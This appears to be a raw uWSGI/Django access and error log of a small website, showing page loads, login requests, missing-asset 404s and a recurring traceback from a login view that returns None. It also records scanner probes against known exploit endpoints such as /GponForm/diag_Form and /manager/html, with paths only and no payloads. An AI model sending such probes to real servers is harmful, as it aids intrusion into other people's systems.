Found: /static/scss/icons/material-design-iconic-font/css/materialdesignicons.min.css +[pid: 12823|app: 0|req: 960/1270] 219.228.146.187 () {38 vars in 918 bytes} [Tue Jan 12 06:38:27 2021] GET /static/scss/icons/material-design-iconic-font/css/materialdesignicons.min.css => generated 3595 bytes in 4 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +Not Found: /static/css/spinners.css +[pid: 12823|app: 0|req: 961/1271] 219.228.146.187 () {38 vars in 810 bytes} [Tue Jan 12 06:38:27 2021] GET /static/css/spinners.css => generated 3433 bytes in 3 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +Not Found: /static/css/animate.css +[pid: 12823|app: 0|req: 962/1272] 219.228.146.187 () {38 vars in 808 bytes} [Tue Jan 12 06:38:27 2021] GET /static/css/animate.css => generated 3430 bytes in 4 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +[pid: 12823|app: 0|req: 963/1273] 219.228.146.187 () {40 vars in 868 bytes} [Tue Jan 12 06:38:27 2021] GET /kind-manage/ => generated 12023 bytes in 5 msecs (HTTP/1.1 200) 7 headers in 350 bytes (1 switches on core 1) +Not Found: /static/scss/icons/weather-icons/css/weather-icons.min.css +[pid: 12823|app: 0|req: 964/1274] 219.228.146.187 () {38 vars in 877 bytes} [Tue Jan 12 06:38:28 2021] GET /static/scss/icons/weather-icons/css/weather-icons.min.css => generated 3535 bytes in 4 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0) +Not Found: /static/scss/icons/linea-icons/linea.css +[pid: 12823|app: 0|req: 965/1275] 219.228.146.187 () {38 vars in 841 bytes} [Tue Jan 12 06:38:28 2021] GET /static/scss/icons/linea-icons/linea.css => generated 3481 bytes in 3 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0) +Not Found: /static/scss/icons/simple-line-icons/css/simple-line-icons.css +[pid: 12823|app: 0|req: 966/1276] 219.228.146.187 () {38 vars in 885 bytes} [Tue Jan 12 06:38:28 2021] GET /static/scss/icons/simple-line-icons/css/simple-line-icons.css => generated 3547 bytes in 3 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0) +Not Found: /static/scss/icons/font-awesome/css/font-awesome.min.css +[pid: 12823|app: 0|req: 967/1277] 219.228.146.187 () {38 vars in 873 bytes} [Tue Jan 12 06:38:28 2021] GET /static/scss/icons/font-awesome/css/font-awesome.min.css => generated 3529 bytes in 3 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0) +Not Found: /static/scss/icons/themify-icons/themify-icons.css +[pid: 12823|app: 0|req: 968/1278] 219.228.146.187 () {38 vars in 861 bytes} [Tue Jan 12 06:38:28 2021] GET /static/scss/icons/themify-icons/themify-icons.css => generated 3511 bytes in 4 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0) +Not Found: /static/scss/icons/material-design-iconic-font/css/materialdesignicons.min.css +[pid: 12823|app: 0|req: 969/1279] 219.228.146.187 () {38 vars in 917 bytes} [Tue Jan 12 06:38:28 2021] GET /static/scss/icons/material-design-iconic-font/css/materialdesignicons.min.css => generated 3595 bytes in 3 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0) +Not Found: /static/css/spinners.css +[pid: 12823|app: 0|req: 970/1280] 219.228.146.187 () {38 vars in 809 bytes} [Tue Jan 12 06:38:28 2021] GET /static/css/spinners.css => generated 3433 bytes in 3 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0) +Not Found: /static/css/animate.css +[pid: 12823|app: 0|req: 971/1281] 219.228.146.187 () {38 vars in 807 bytes} [Tue Jan 12 06:38:28 2021] GET /static/css/animate.css => generated 3430 bytes in 3 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0) +Not Found: /static/scss/icons/flag-icon-css/flag-icon.min.css +[pid: 12823|app: 0|req: 972/1282] 219.228.146.187 () {38 vars in 861 bytes} [Tue Jan 12 06:38:28 2021] GET /static/scss/icons/flag-icon-css/flag-icon.min.css => generated 3511 bytes in 4 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0) +[pid: 12823|app: 0|req: 973/1283] 219.228.146.187 () {38 vars in 807 bytes} [Tue Jan 12 06:38:34 2021] GET /my-admin/ => generated 5354 bytes in 1 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 0) +[pid: 12823|app: 0|req: 974/1284] 219.228.146.187 () {40 vars in 850 bytes} [Tue Jan 12 06:38:35 2021] GET /login => generated 0 bytes in 0 msecs (HTTP/1.1 301) 5 headers in 175 bytes (1 switches on core 0) +[pid: 12823|app: 0|req: 975/1285] 219.228.146.187 () {40 vars in 852 bytes} [Tue Jan 12 06:38:35 2021] GET /login/ => generated 6416 bytes in 1 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 0) +[pid: 12823|app: 0|req: 976/1286] 219.228.146.187 () {48 vars in 1002 bytes} [Tue Jan 12 06:38:54 2021] POST /login/ => generated 82 bytes in 3 msecs (HTTP/1.1 200) 5 headers in 165 bytes (1 switches on core 0) +[pid: 12823|app: 0|req: 977/1287] 219.228.146.187 () {48 vars in 1002 bytes} [Tue Jan 12 06:39:07 2021] POST /login/ => generated 27 bytes in 7 msecs (HTTP/1.1 200) 7 headers in 324 bytes (1 switches on core 1) +[pid: 12823|app: 0|req: 978/1288] 219.228.146.187 () {40 vars in 847 bytes} [Tue Jan 12 06:39:07 2021] GET /home/ => generated 8644 bytes in 7 msecs (HTTP/1.1 200) 6 headers in 181 bytes (1 switches on core 0) +[pid: 12823|app: 0|req: 979/1289] 66.240.205.34 () {30 vars in 479 bytes} [Tue Jan 12 06:45:06 2021] GET / => generated 6416 bytes in 1 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 1) +Not Found: /robots.txt +[pid: 12823|app: 0|req: 980/1290] 66.240.205.34 () {26 vars in 308 bytes} [Tue Jan 12 06:45:08 2021] GET /robots.txt => generated 3394 bytes in 4 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +Not Found: /sitemap.xml +[pid: 12823|app: 0|req: 981/1291] 66.240.205.34 () {26 vars in 310 bytes} [Tue Jan 12 06:45:11 2021] GET /sitemap.xml => generated 3397 bytes in 4 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +Not Found: /.well-known/security.txt +[pid: 12823|app: 0|req: 982/1292] 66.240.205.34 () {26 vars in 336 bytes} [Tue Jan 12 06:45:16 2021] GET /.well-known/security.txt => generated 3436 bytes in 4 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +[pid: 12823|app: -1|req: -1/1293] 66.240.205.34 () {32 vars in 485 bytes} [Tue Jan 12 06:45:18 2021] GET /static/img/favicon.ico => generated 1150 bytes in 1 msecs via sendfile() (HTTP/1.1 200) 2 headers in 87 bytes (0 switches on core 1) +[pid: 12823|app: 0|req: 983/1294] 35.187.190.226 () {38 vars in 512 bytes} [Tue Jan 12 06:45:23 2021] GET / => generated 6416 bytes in 1 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 0) +[pid: 12823|app: 0|req: 984/1295] 101.89.29.78 () {32 vars in 604 bytes} [Tue Jan 12 06:48:49 2021] GET /admin-home => generated 0 bytes in 0 msecs (HTTP/1.1 301) 5 headers in 180 bytes (1 switches on core 0) +[pid: 12823|app: 0|req: 985/1296] 101.227.139.164 () {32 vars in 565 bytes} [Tue Jan 12 06:49:01 2021] GET /announcement => generated 0 bytes in 0 msecs (HTTP/1.1 301) 5 headers in 182 bytes (1 switches on core 0) +[pid: 12823|app: 0|req: 986/1297] 83.97.20.21 () {26 vars in 278 bytes} [Tue Jan 12 07:09:14 2021] GET / => generated 6416 bytes in 1 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 0) +Internal Server Error: / +Traceback (most recent call last): + File "/www/wwwroot/master/master_venv/lib/python3.7/site-packages/django/core/handlers/exception.py", line 47, in inner + response = get_response(request) + File "/www/wwwroot/master/master_venv/lib/python3.7/site-packages/django/core/handlers/base.py", line 188, in _get_response + self.check_response(response, callback) + File "/www/wwwroot/master/master_venv/lib/python3.7/site-packages/django/core/handlers/base.py", line 311, in check_response + "instead." % name +ValueError: The view app01.views.login didn't return an HttpResponse object. It returned None instead. +[pid: 12823|app: 0|req: 987/1298] 83.97.20.21 () {22 vars in 227 bytes} [Tue Jan 12 07:09:26 2021] OPTIONS / => generated 52541 bytes in 21 msecs (HTTP/1.0 500) 6 headers in 186 bytes (1 switches on core 0) +[uwsgi-http key: VM-0-13-centos client_addr: 83.97.20.21 client_port: 38898] hr_write(): Broken pipe [plugins/http/http.c line 565] +Not Found: /http:/nginx.korsangazi.com/scan.html +[pid: 12823|app: 0|req: 988/1299] 95.214.53.156 () {26 vars in 354 bytes} [Tue Jan 12 07:18:22 2021] GET http://nginx.korsangazi.com/scan.html => generated 1728 bytes in 4 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +[pid: 12823|app: 0|req: 989/1300] 83.97.20.34 () {26 vars in 277 bytes} [Tue Jan 12 07:43:24 2021] GET / => generated 6416 bytes in 1 msecs (HTTP/1.0 200) 7 headers in 349 bytes (1 switches on core 1) +[pid: 12823|app: 0|req: 990/1301] 114.33.121.193 () {36 vars in 500 bytes} [Tue Jan 12 07:51:49 2021] GET / => generated 6416 bytes in 1 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 1) +[pid: 12823|app: -1|req: -1/1302] 113.96.198.50 () {28 vars in 352 bytes} [Tue Jan 12 07:59:56 2021] GET /static/img/back-top-btn.png => generated 1790 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 87 bytes (0 switches on core 1) +[pid: 12823|app: 0|req: 991/1303] 83.97.20.21 () {26 vars in 278 bytes} [Tue Jan 12 08:00:32 2021] GET / => generated 6416 bytes in 1 msecs (HTTP/1.0 200) 7 headers in 349 bytes (1 switches on core 1) +[pid: 12823|app: 0|req: 992/1304] 83.97.20.34 () {26 vars in 278 bytes} [Tue Jan 12 08:37:34 2021] GET / => generated 6416 bytes in 1 msecs (HTTP/1.0 200) 7 headers in 349 bytes (1 switches on core 1) +[pid: 12823|app: 0|req: 993/1305] 83.97.20.21 () {26 vars in 278 bytes} [Tue Jan 12 08:43:27 2021] GET / => generated 6416 bytes in 1 msecs (HTTP/1.0 200) 7 headers in 349 bytes (1 switches on core 1) +[pid: 12823|app: 0|req: 994/1306] 128.14.134.134 () {30 vars in 438 bytes} [Tue Jan 12 09:23:18 2021] GET / => generated 6416 bytes in 1 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 1) +Not Found: /webfig/ +[pid: 12823|app: 0|req: 995/1307] 128.14.134.134 () {30 vars in 452 bytes} [Tue Jan 12 09:23:19 2021] GET /webfig/ => generated 3385 bytes in 3 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +[pid: 12823|app: 0|req: 996/1308] 83.97.20.21 () {26 vars in 277 bytes} [Tue Jan 12 09:30:57 2021] GET / => generated 6416 bytes in 1 msecs (HTTP/1.0 200) 7 headers in 349 bytes (1 switches on core 1) +[pid: 12823|app: 0|req: 997/1309] 83.97.20.21 () {26 vars in 278 bytes} [Tue Jan 12 10:14:43 2021] GET / => generated 6416 bytes in 1 msecs (HTTP/1.0 200) 7 headers in 349 bytes (1 switches on core 1) +Not Found: /GponForm/diag_Form +[pid: 12823|app: 0|req: 998/1310] 222.247.200.187 () {34 vars in 442 bytes} [Tue Jan 12 10:22:59 2021] POST /GponForm/diag_Form?images/ => generated 3423 bytes in 4 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +[pid: 12823|app: 0|req: 999/1311] 103.126.6.96 () {22 vars in 234 bytes} [Tue Jan 12 10:31:15 2021] GET /login => generated 0 bytes in 0 msecs (HTTP/1.0 301) 5 headers in 175 bytes (1 switches on core 1) +Not Found: /manager/html +[pid: 12823|app: 0|req: 1000/1312] 103.126.6.96 () {24 vars in 300 bytes} [Tue Jan 12 10:31:16 2021] GET /manager/html => generated 3401 bytes in 4 msecs (HTTP/1.0 404) 5 headers in 159 bytes (1 switches on core 1) +[pid: 12823|app: 0|req: 1001/1313] 196.52.43.60 () {26 vars in 377 bytes} [Tue Jan 12 10:45:44 2021] GET / => generated 6416 bytes in 1 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 1) +[pid: 12823|app: 0|req: 1002/1314] 83.97.20.21 () {26 vars in 278 bytes} [Tue Jan 12 10:53:54 2021] GET / => generated 6416 bytes in 1 msecs (HTTP/1.0 200) 7 headers in 349 bytes (1 switches on core 1) +[pid: 12823|app: 0|req: 1003/1315] 83.97.20.21 () {26 vars in 277 bytes} [Tue Jan 12 11:41:34 2021] GET / => generated 6416 bytes in 1 msecs (HTTP/1.0 200) 7 headers in 349 bytes (1 switches on core 1) +[pid: 12823|app: 0|req: 1004/1316] 83.97.20.21 () {26 vars in 278 bytes} [Tue Jan 12 11:41:48 2021] GET / => generated 6416 bytes in 1 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 1) +[pid: 12823|app: 0|req: 1005/1317] 83.97.20.21 () {26 vars in 278 bytes} [Tue Jan 12 12:28:32 2021] GET / => generated 6416 bytes in 1 msecs (HTTP/1.0 200) 7 headers in 349 bytes (1 switches on core 1) +[pid: 12823|app: 0|req: 1006/1318] 83.97.20.21 () {26 vars in 278 bytes} [Tue Jan 12 12:28:45 2021] GET / => generated 6416 bytes in 2 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 1) +Internal Server Error: / +Traceback (most recent call last): + File "/www/wwwroot/master/master_venv/lib/python3.7/site-packages/django/core/handlers/exception.py", line 47, in inner + response = get_response(request) + File "/www/wwwroot/master/master_venv/lib/python3.7/site-packages/django/core/handlers/base.py", line 188, in _get_response + self.check_response(response, callback) + File "/www/wwwroot/master/master_venv/lib/python3.7/site-packages/django/core/handlers/base.py", line 311, in check_response + "instead." % name +ValueError: The view app01.views.login didn't return an HttpResponse object. It returned None instead. +[pid: 12823|app: 0|req: 1007/1319] 83.97.20.21 () {22 vars in 227 bytes} [Tue Jan 12 12:29:01 2021] OPTIONS / => generated 52541 bytes in 21 msecs (HTTP/1.0 500) 6 headers in 186 bytes (1 switches on core 1) +[pid: 12823|app: 0|req: 1008/1320] 219.228.146.150 () {36 vars in 614 bytes} [Tue Jan 12 13:00:11 2021] GET / => generated 6416 bytes in 1 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 0) +[pid: 12823|app: -1|req: -1/1321] 219.228.146.150 () {38 vars in 715 bytes} [Tue Jan 12 13:00:11 2021] GET /static/css/flexslider.css => generated 3552 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 87 bytes (0 switches on core 0) +[pid: 12823|app: -1|req: -1/1322] 219.228.146.150 () {38 vars in 713 bytes} [Tue Jan 12 13:00:11 2021] GET /static/css/bootstrap.css => generated 118128 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 89 bytes (0 switches on core 0) +[pid: 12823|app: -1|req: -1/1323] 219.228.146.150 () {38 vars in 735 bytes} [Tue Jan 12 13:00:11 2021] GET /static/css/bootstrap-responsive.css => generated 20999 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 88 bytes (0 switches on core 0) +[pid: 12823|app: -1|req: -1/1324] 219.228.146.150 () {38 vars in 717 bytes} [Tue Jan 12 13:00:11 2021] GET /static/css/prettyPhoto.css => generated 26845 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 88 bytes (0 switches on core 0) +[pid: 12823|app: -1|req: -1/1325] 219.228.146.150 () {38 vars in 696 bytes} [Tue Jan 12 13:00:11 2021] GET /static/js/jquery.min.js => generated 86596 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 88 bytes (0 switches on core 0) +[pid: 12823|app: -1|req: -1/1326] 219.228.146.150 () {38 vars in 712 bytes} [Tue Jan 12 13:00:11 2021] GET /static/js/jquery.prettyPhoto.js => generated 35912 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 88 bytes (0 switches on core 0) +[pid: 12823|app: -1|req: -1/1327] 219.228.146.150 () {38 vars in 702 bytes} [Tue Jan 12 13:00:11 2021] GET /static/js/jquery.custom.js => generated 3065 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 87 bytes (0 switches on core 0) +[pid: 12823|app: -1|req: -1/1328] 219.228.146.150 () {38 vars in 721 bytes} [Tue Jan 12 13:00:12 2021] GET /static/css/custom-styles.css => generated 20296 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 88 bytes (0 switches on core 0) +[pid: 12823|app: -1|req: -1/1329] 219.228.146.150 () {38 vars in 694 bytes} [Tue Jan 12 13:00:12 2021] GET /static/js/bootstrap.js => generated 56264 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 88 bytes (0 switches on core 0) +[pid: 12823|app: -1|req: -1/1330] 219.228.146.150 () {38 vars in 710 bytes} [Tue Jan 12 13:00:12 2021] GET /static/js/jquery.flexslider.js => generated 40181 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 88 bytes (0 switches on core 0) +[pid: 12823|app: -1|req: -1/1331] 219.228.146.150 () {38 vars in 742 bytes} [Tue Jan 12 13:00:16 2021] GET /static/img/page-bg-1.jpg => generated 1600 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 87 bytes (0 switches on core 0) +[pid: 12823|app: -1|req: -1/1332] 219.228.146.150 () {34 vars in 547 bytes} [Tue Jan 12 13:00:16 2021] GET /static/img/favicon.ico => generated 1150 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 87 bytes (0 switches on core 0) +[pid: 12823|app: -1|req: -1/1333] 219.228.146.150 () {38 vars in 748 bytes} [Tue Jan 12 13:00:16 2021] GET /static/img/back-top-btn.png => generated 1790 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 87 bytes (0 switches on core 0) +[pid: 12823|app: 0|req: 1009/1334] 219.228.146.150 () {50 vars in 928 bytes} [Tue Jan 12 13:00:24 2021] POST / => generated 27 bytes in 5 msecs (HTTP/1.1 200) 7 headers in 324 bytes (2 switches on core 0) +[pid: 12823|app: 0|req: 1010/1335] 219.228.146.150 () {40 vars in 797 bytes} [Tue Jan 12 13:00:24 2021] GET /home => generated 0 bytes in 0 msecs (HTTP/1.1 301) 5 headers in 174 bytes (1 switches on core 1) +[pid: 12823|app: 0|req: 1011/1336] 219.228.146.150 () {40 vars in 799 bytes} [Tue Jan 12 13:00:24 2021] GET /home/ => generated 8644 bytes in 7 msecs (HTTP/1.1 200) 6 headers in 181 bytes (1 switches on core 1) +[pid: 12823|app: 0|req: 1012/1337] 219.228.146.150 () {40 vars in 808 bytes} [Tue Jan 12 13:00:32 2021] GET /publish => generated 0 bytes in 0 msecs (HTTP/1.1 301) 5 headers in 177 bytes (1 switches on core 0) +[pid: 12823|app: 0|req: 1013/1338] 219.228.146.150 () {40 vars in 810 bytes} [Tue Jan 12 13:00:32 2021] GET /publish/ => generated 5083 bytes in 5 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 0) +[pid: 12823|app: 0|req: 1014/1339] 219.228.146.150 () {40 vars in 799 bytes} [Tue Jan 12 13:00:43 2021] GET /home/ => generated 8644 bytes in 7 msecs (HTTP/1.1 200) 6 headers in 181 bytes (1 switches on core 1) +[pid: 12823|app: 0|req: 1015/1340] 219.228.146.150 () {40 vars in 812 bytes} [Tue Jan 12 13:00:53 2021] GET /all-0-0-0 => generated 9502 bytes in 8 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 0) +[pid: 12823|app: -1|req: -1/1341] 219.228.146.150 () {38 vars in 761 bytes} [Tue Jan 12 13:00:53 2021] GET /static/js/jquery.quicksand.js => generated 14697 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 88 bytes (0 switches on core 1) +[pid: 12823|app: -1|req: -1/1342] 219.228.146.150 () {38 vars in 833 bytes} [Tue Jan 12 13:00:53 2021] GET /static/img/t_photo/7_%E7%8E%A9%E5%85%B7%E8%BD%A6.jpg => generated 23084 bytes in 1 msecs via sendfile() (HTTP/1.1 200) 2 headers in 88 bytes (0 switches on core 1) +[pid: 12823|app: -1|req: -1/1343] 219.228.146.150 () {38 vars in 763 bytes} [Tue Jan 12 13:00:53 2021] GET /static/js/jquery.easing.1.3.js => generated 8097 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 87 bytes (0 switches on core 1) +[pid: 12823|app: -1|req: -1/1344] 219.228.146.150 () {38 vars in 857 bytes} [Tue Jan 12 13:00:53 2021] GET /static/img/t_photo/6_%E9%80%89%E6%8B%A9%E5%99%A8%E6%9D%83%E9%87%8D.png => generated 65134 bytes in 1 msecs via sendfile() (HTTP/1.1 200) 2 headers in 88 bytes (0 switches on core 0) +[pid: 12823|app: 0|req: 1016/1345] 219.228.146.150 () {40 vars in 799 bytes} [Tue Jan 12 13:01:00 2021] GET /home/ => generated 8644 bytes in 7 msecs (HTTP/1.1 200) 6 headers in 181 bytes (1 switches on core 1) +[pid: 12823|app: 0|req: 1017/1346] 83.97.20.21 () {26 vars in 278 bytes} [Tue Jan 12 13:11:39 2021] GET / => generated 6416 bytes in 2 msecs (HTTP/1.0 200) 7 headers in 349 bytes (1 switches on core 0) +[uwsgi-http key: client_addr: 61.219.11.153 client_port: 3583] hr_read(): Connection reset by peer [plugins/http/http.c line 917] +[pid: 12823|app: 0|req: 1018/1347] 83.97.20.21 () {26 vars in 278 bytes} [Tue Jan 12 13:51:50 2021] GET / => generated 6416 bytes in 1 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 0) +invalid request block size: 34676 (max 4096)...skip +[uwsgi-http key: 212.64.67.134:8080 client_addr: 58.247.212.239 client_port: 64977] hr_instance_read(): Connection reset by peer [plugins/http/http.c line 647] +[pid: 12823|app: 0|req: 1019/1348] 83.97.20.21 () {26 vars in 278 bytes} [Tue Jan 12 14:36:23 2021] GET / => generated 6416 bytes in 2 msecs (HTTP/1.0 200) 7 headers in 349 bytes (1 switches on core 0) +[pid: 12823|app: 0|req: 1020/1349] 31.57.34.202 () {28 vars in 403 bytes} [Tue Jan 12 15:15:05 2021] GET / => generated 6416 bytes in 1 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 0) +[pid: 12823|app: 0|req: 1021/1350] 83.97.20.21 () {26 vars in 278 bytes} [Tue Jan 12 15:19:30 2021] GET / => generated 6416 bytes in 1 msecs (HTTP/1.0 200) 7 headers in 349 bytes (1 switches on core 0) +[pid: 12823|app: 0|req: 1022/1351] 83.97.20.21 () {26 vars in 278 bytes} [Tue Jan 12 15:58:44 2021] GET / => generated 6416 bytes in 1 msecs (HTTP/1.0 200) 7 headers in 349 bytes (1 switches on core 0) +Not Found: /config/getuser +[pid: 12823|app: 0|req: 1023/1352] 209.141.60.195 () {36 vars in 618 bytes} [Tue Jan 12 16:27:00 2021] GET /config/getuser?index=0 => generated 3414 bytes in 4 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0) +[pid: 12823|app: 0|req: 1024/1353] 83.97.20.21 () {26 vars in 278 bytes} [Tue Jan 12 16:38:13 2021] GET / => generated 6416 bytes in 1 msecs (HTTP/1.0 200) 7 headers in 349 bytes (1 switches on core 0) +[pid: 12823|app: 0|req: 1025/1354] 92.38.46.104 () {28 vars in 402 bytes} [Tue Jan 12 16:52:06 2021] GET / => generated 6416 bytes in 2 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 0) +Not Found: /index.html +[pid: 12823|app: 0|req: 1026/1355] 205.185.120.128 () {40 vars in 684 bytes} [Tue Jan 12 16:57:22 2021] GET /index.html => generated 3394 bytes in 4 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0) +[pid: 12823|app: 0|req: 1027/1356] 83.97.20.21 () {26 vars in 277 bytes} [Tue Jan 12 17:15:02 2021] GET / => generated 6416 bytes in 1 msecs (HTTP/1.0 200) 7 headers in 349 bytes (1 switches on core 0) +[pid: 12823|app: 0|req: 1028/1357] 83.97.20.21 () {26 vars in 278 bytes} [Tue Jan 12 17:53:04 2021] GET / => generated 6416 bytes in 1 msecs (HTTP/1.0 200) 7 headers in 349 bytes (1 switches on core 0) +[pid: 12823|app: 0|req: 1029/1358] 177.11.136.14 () {28 vars in 404 bytes} [Tue Jan 12 18:28:35 2021] GET / => generated 6416 bytes in 1 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 0) +[pid: 12823|app: 0|req: 1030/1359] 83.97.20.21 () {26 vars in 278 bytes} [Tue Jan 12 18:30:35 2021] GET / => generated 6416 bytes in 1 msecs (HTTP/1.0 200) 7 headers in 349 bytes (1 switches on core 0) +[pid: 12823|app: 0|req: 1031/1360] 101.32.181.171 () {22 vars in 235 bytes} [Tue Jan 12 18:51:33 2021] GET /login => generated 0 bytes in 0 msecs (HTTP/1.0 301) 5 headers in 175 bytes (1 switches on core 0) +Not Found: /manager/html/ +[pid: 12823|app: 0|req: 1032/1361] 101.32.181.171 () {24 vars in 304 bytes} [Tue Jan 12 18:51:33 2021] GET /manager/html/ => generated 3404 bytes in 3 msecs (HTTP/1.0 404) 5 headers in 159 bytes (1 switches on core 0) +[pid: 12823|app: 0|req: 1033/1362] 83.97.20.21 () {26 vars in 278 bytes} [Tue Jan 12 19:10:33 2021] GET / => generated 6416 bytes in 1 msecs (HTTP/1.0 200) 7 headers in 349 bytes (1 switches on core 0) +[pid: 12823|app: 0|req: 1034/1363] 177.84.40.106 () {28 vars in 402 bytes} [Tue Jan 12 19:22:48 2021] GET / => generated 6416 bytes in 1 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 0) +[pid: 12823|app: 0|req: 1035/1364] 187.57.71.226 () {28 vars in 403 bytes} [Tue Jan 12 19:35:09 2021] GET / => generated 6416 bytes in 1 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 0) +[pid: 12823|app: 0|req: 1036/1365] 187.57.71.226 () {28 vars in 402 bytes} [Tue Jan 12 19:35:09 2021] GET / => generated 6416 bytes in 1 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 0) +[pid: 12823|app: 0|req: 1037/1366] 83.97.20.21 () {26 vars in 278 bytes} [Tue Jan 12 19:48:33 2021] GET / => generated 6416 bytes in 1 msecs (HTTP/1.0 200) 7 headers in 349 bytes (1 switches on core 0) +[pid: 12823|app: 0|req: 1038/1367] 83.97.20.21 () {26 vars in 278 bytes} [Tue Jan 12 20:25:29 2021] GET / => generated 6416 bytes in 1 msecs (HTTP/1.0 200) 7 headers in 349 bytes (1 switches on core 0) +[pid: 12823|app: 0|req: 1039/1368] 83.97.20.21 () {26 vars in 278 bytes} [Tue Jan 12 21:04:45 2021] GET / => generated 6416 bytes in 1 msecs (HTTP/1.0 200) 7 headers in 349 bytes (1 switches on core 0) +Internal Server Error: / +Traceback (most recent call last): + File "/www/wwwroot/master/master_venv/lib/python3.7/site-packages/django/core/handlers/exception.py", line 47, in inner + response = get_response(request) + File "/www/wwwroot/master/master_venv/lib/python3.7/site-packages/django/core/handlers/base.py", line 188, in _get_response + self.check_response(response, callback) + File "/www/wwwroot/master/master_venv/lib/python3.7/site-packages/django/core/handlers/base.py", line 311, in check_response + "instead." % name +ValueError: The view app01.views.login didn't return an HttpResponse object. It returned None instead. +[pid: 12823|app: 0|req: 1040/1369] 89.248.168.108 () {22 vars in 227 bytes} [Tue Jan 12 21:14:54 2021] HEAD / => generated 52529 bytes in 22 msecs (HTTP/1.0 500) 6 headers in 186 bytes (1 switches on core 0) +[pid: 12823|app: 0|req: 1041/1370] 83.97.20.21 () {26 vars in 278 bytes} [Tue Jan 12 21:46:35 2021] GET / => generated 6416 bytes in 1 msecs (HTTP/1.0 200) 7 headers in 349 bytes (1 switches on core 1) +[pid: 12823|app: 0|req: 1042/1371] 185.36.81.49 () {28 vars in 381 bytes} [Tue Jan 12 22:09:25 2021] GET / => generated 6416 bytes in 2 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 1) +Not Found: /GponForm/diag_Form +[pid: 12823|app: 0|req: 1043/1372] 119.123.218.247 () {34 vars in 442 bytes} [Tue Jan 12 22:10:55 2021] POST /GponForm/diag_Form?images/ => generated 3423 bytes in 4 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +[pid: 12823|app: 0|req: 1044/1373] 83.97.20.21 () {26 vars in 278 bytes} [Tue Jan 12 22:26:21 2021] GET / => generated 6416 bytes in 1 msecs (HTTP/1.0 200) 7 headers in 349 bytes (1 switches on core 1) +[pid: 12823|app: 0|req: 1045/1374] 83.97.20.21 () {26 vars in 278 bytes} [Tue Jan 12 23:04:20 2021] GET / => generated 6416 bytes in 1 msecs (HTTP/1.0 200) 7 headers in 349 bytes (1 switches on core 1) +[pid: 12823|app: 0|req: 1046/1375] 190.115.189.74 () {22 vars in 235 bytes} [Tue Jan 12 23:08:55 2021] GET /login => generated 0 bytes in 0 msecs (HTTP/1.0 301) 5 headers in 175 bytes (1 switches on core 1) +Not Found: /manager/html +[pid: 12823|app: 0|req: 1047/1376] 190.115.189.74 () {24 vars in 302 bytes} [Tue Jan 12 23:08:55 2021] GET /manager/html => generated 3401 bytes in 4 msecs (HTTP/1.0 404) 5 headers in 159 bytes (1 switches on core 1) +[pid: 12823|app: 0|req: 1048/1377] 103.87.172.175 () {22 vars in 236 bytes} [Tue Jan 12 23:11:01 2021] GET /login => 